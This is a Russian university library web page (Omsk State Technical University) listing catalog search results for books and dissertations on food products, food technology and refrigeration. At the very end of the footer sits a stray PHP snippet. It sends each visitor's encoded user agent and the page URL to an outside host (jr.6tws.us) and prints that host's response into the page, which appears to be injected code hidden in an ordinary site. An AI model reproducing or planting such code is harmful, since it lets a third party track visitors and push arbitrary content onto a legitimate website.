Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

127 пользователей


Зарегистрированных: 1 

Кацевал Руслан Наильевич


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Пищевой продукт")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 17
1. 
Хлебников, Владимир Иванович. Технология товаров (продовольственных) [Текст] : Учеб. для вузов по специальности 061600 "Товароведение и экспертиза товаров" / В. И. Хлебников, 2000. - 426 с.
2. 
Ваше право на качественную и безопасную пищу [Текст] : Законодат.- норматив. акты. Образцы док. Правовые коммент. / Российская Федерация. Законы, 2002. - 175 с.
3. 
Технология обработки продуктов общественного питания [Текст] : Метод. указания для студентов днев. и вечер. форм обучения специальности 060800 "Экономика и упр. на предприятии (торговли и обществ. питания)" / В. В. Бирюкова, 2001. - 23 с.
Держатели документа (Информация об экземплярах) 
Полный текст
4. 
Бабакин, Борис Сергеевич. Электротехнология в холодильной промышленности [Текст] / Б. С. Бабакин, 1990. - 208 с.
Держатели документа (Информация об экземплярах) 
5. 
Грубы Я. Производство замороженных продуктов [Текст] : Пер. с чеш. / Я. Грубы, 1990. - 336 с.
Держатели документа (Информация об экземплярах) 
6. 
Информационные технологии в науке и производстве [Текст] / ОмГТУ, 2017. - 179 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

В сборник вошли статьи по новейшим разработкам ученых, аспирантов, магистрантов, студентов в области информационных технологий и компьютерных систем.

Издание предназначено широкому кругу научных и инженерно-технических работников, аспирантам, магистрантам и студентам.

Полный текст
7. 
Холодильная техника [Текст] : Учеб. для техн. специальностей пищевых пр-в вузов / В. Ф. Лебедев, И. Г. Чумак, Г. Д. Аверин и др.; Под ред. В. Ф. Лебедева, 1986. - 335 с.
Держатели документа (Информация об экземплярах) 
8. 
Демирова, Амият Фейзудиновна. Использование ротации для интенсификации процесса стерилизации консервов в стеклянной таре [Текст] : Автореф. дис. .. канд техн. наук: 05.18.12 / А. Ф. Демирова, 2000. - 18 с.
Держатели документа (Информация об экземплярах) 
9. 
Матюхина, Зинаида Петровна. Товароведение пищевых продуктов [Текст] : Учеб. для учреждений нач. проф. образования, подгот. и переподгот. рабочих на пр-ве и в центрах занятости, проф. обучения учащихся сред. общеобразоват. шк. / З. П. Матюхина, Э. П. Королькова, 2000. - 272 с.
10. 
Буянов, Олег Николаевич. Научные и практические основы дискретного теплоотвода при быстром замораживании пищевых продуктов в потоке воздуха [Текст] : Автореф. дис. .. д-р техн. наук: 05.18.12 / О. Н. Буянов, 1998. - 42 с.
Держатели документа (Информация об экземплярах) 
11. 
Ревелль, Пенелопа. Среда нашего обитания [Текст] : В 4 кн. Кн. 1 : Народонаселение и пищевые ресурсы / Пер. с англ. С. В. Ан, Т. В. Никитиной, 1994. - 340 с.
Держатели документа (Информация об экземплярах) 
12. 
13. 
Матюхина, Зинаида Петровна. Товароведение пищевых продуктов [Текст] : Учеб. для учеб. заведений нач. проф. образования / З. П. Матюхина, Э. П. Королькова, 1999. - 272 с.
14. 
Сборник примеров расчетов и лабораторных работ по курсу "Холодильное технологическое оборудование" [Текст] : Учеб. пособие для вузов / М. М. Голянд, Б. Н. Малеванный, М. З. Печатников, В. Т. Плотников, 1981. - 166 с.
Держатели документа (Информация об экземплярах) 
15. 
Баранов, Игорь Владимирович. Методы и средства измерения тепловых и влажностных свойств пищевых продуктов и материалов в условиях их замораживания и размораживания [Текст] : Автореф. дис. .. канд. техн. наук: 05.14.05 / И. В. Баранов, 1999. - 15 с.
Держатели документа (Информация об экземплярах) 
16. 
Консервирование пищевых продуктов холодом [Текст] : (Теплофиз. основы): Учеб. пособие для вузов по специальностям "Технология консервов и пищеконцентратов", "Технология мяса и мясных продуктов", "Технология рыбы и рыбных продуктов", "Технология молока и молочных продуктов" / И. А. Рогов, В. Е. Куцакова, В. И. Филиппов, С. В. Фролов, 1999. - 174 с.
Держатели документа (Информация об экземплярах) 
17. 
Николаева, Мария Андреевна. Идентификация и фальсификация пищевых продуктов [Текст] / М. А. Николаева, Д. С. Лычников, А. Н. Неверов, 1996. - 108 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3057 - 23.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.75 с.12 запросов, 0.40c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;